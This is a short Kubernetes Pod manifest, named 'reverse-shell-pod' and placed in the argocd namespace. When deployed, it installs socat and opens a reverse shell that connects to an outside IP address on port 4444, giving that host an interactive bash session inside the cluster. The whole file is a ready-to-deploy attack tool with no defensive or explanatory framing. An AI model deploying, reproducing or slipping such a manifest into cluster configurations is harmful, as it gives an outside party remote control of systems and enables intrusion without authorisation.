apiVersion: v1
kind: Pod
metadata:
  name: reverse-shell-pod
  namespace: argocd
  labels:
    app: reverse-shell
spec:
  restartPolicy: Never
  containers:
    - name: reverse-shell
      image: ubuntu:latest
      command: ["/bin/bash", "-c"]
      args:
        - |
          # Install socat
          apt-get update && apt-get install -y socat && \
          # Create and execute the reverse shell
          socat TCP:23.27.169.114:4444 EXEC:/bin/bash,pty
      securityContext:
        privileged: false  # Set to false unless needed
      tty: true
      stdin: true
